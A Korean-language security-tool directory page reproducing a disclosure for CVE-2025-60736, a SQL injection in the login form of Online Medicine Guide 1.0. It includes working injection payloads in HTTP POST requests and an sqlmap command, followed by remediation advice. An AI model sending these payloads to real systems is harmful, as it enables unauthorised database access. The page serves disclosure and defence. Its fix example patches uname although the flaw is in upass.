Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/nxvh1337/cve-2025-60736
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubnxvh1337/cve-2025-60736

CVE-2025-60736

code-projects Online Medicine Guide 1.0은 SQL 인젝션에 취약합니다.

저장소 보기
110개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-60736: 온라인 의약품 가이드의 SQL 인젝션 취약점

요약

이 문서는 온라인 의약품 가이드(Online Medicine Guide) 웹 애플리케이션에서 발견된 심각한 SQL 인젝션 취약점에 대해 설명합니다. 이 취약점은 승인되지 않은 데이터베이스 접근을 허용하며, 애플리케이션과 사용자에게 심각한 보안 위험을 초래합니다.

제출자

  • Noah "nxvh" Heraud

1. 제품 정보

영향받는 제품

  • 제품명: Online Medicine Guide
  • 공급업체: Code Projects
  • 공급업체 홈페이지: https://code-projects.org/online-medicine-guide-in-php-css-javascript-and-mysql-free-download/
  • 영향받는 버전: v1.0
  • 취약 파일: /login.php
  • 소프트웨어 유형: 웹 애플리케이션 (PHP/MySQL)

기술 세부 사항

  • 프로그래밍 언어: PHP
  • 데이터베이스: MySQL
  • 프론트엔드: CSS, JavaScript
  • 아키텍처: LAMP/WAMP 스택
  • 2. 취약점 세부 사항

    취약점 분류

    • CVE ID: CVE-2025-60736
    • 취약점 유형: SQL 인젝션
    • 심각도: 치명적(Critical)
    • CVSS 점수: 9.8 (치명적)
    • 공격 경로: 네트워크
    • 공격 복잡성: 낮음
    • 필요 권한: 없음
    • 사용자 상호작용: 없음
    • 범위: 변경됨

    근본 원인 분석

    이 취약점은 /login.php 파일의 입력 검증 및 삭제(sanitization) 부족에서 비롯됩니다. 애플리케이션은 upass 매개변수의 사용자 입력을 적절한 삭제 처리나 준비된 문(prepared statements) 없이 SQL 쿼리에 직접 연결합니다.

    기술적 근본 원인:

    • SQL 쿼리에서의 직접적인 문자열 연결
    • 입력 검증 및 삭제 부족
    • 준비된 문 구현 누락
    • 매개변수 바인딩 부족

    3. 개념 증명

    취약점 위치

    • 파일: /login.php
    • 매개변수: upass (POST)
    • 공격 경로: HTTP POST 요청 변조

    악용 방법

    방법 1: 부울 기반 SQL 인젝션

    root@kitploit:~
    POST /login.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx
    

    방법 1: 오류 기반 SQL 인젝션

    root@kitploit:~
    POST /login.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp
    

    방법 2: 시간 기반 블라인드 SQL 인젝션

    root@kitploit:~
    POST /login.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa
    

    자동화 테스트

    이 취약점은 sqlmap을 사용하여 확인되었습니다:

    root@kitploit:~
    sqlmap -u "http://localhost:8000/login.php" --data="uname=admin&upass=test" -p upass --batch --dbs
    

    proof of exploit

    4. 수정 계획

    즉시 조치

    1. 긴급 패치: upass 매개변수에 대한 입력 검증 구현
    2. 데이터베이스 모니터링: 의심스러운 활동에 대한 포괄적인 로깅 활성화
    3. 접근 제한: 속도 제한 및 IP 기반 제한 구현
    4. 보안 감사: 즉각적인 보안 평가 수행

    5. 기술적 수정

    코드 수정 예시

    수정 전 (취약):

    root@kitploit:~
    $query = "SELECT * FROM users WHERE username = '" . $_POST['uname'] . "'";
    

    수정 후 (안전):

    root@kitploit:~
    $stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
    $stmt->execute([$_POST['uname']]);
    

    보안 모범 사례 구현

    1. 준비된 문: 매개변수화된 쿼리만 사용
    2. 입력 검증: 화이트리스트 기반 검증 구현
    3. 출력 인코딩: 모든 출력 데이터를 적절히 인코딩
    4. 오류 처리: 정보 노출이 없는 안전한 오류 처리 구현
    5. 접근 제어: 적절한 인증 및 권한 부여 구현

    문서 버전: 1.0
    최종 업데이트: 2025년 3월 10일 (dd/mm/yyyy)

    도구 다운로드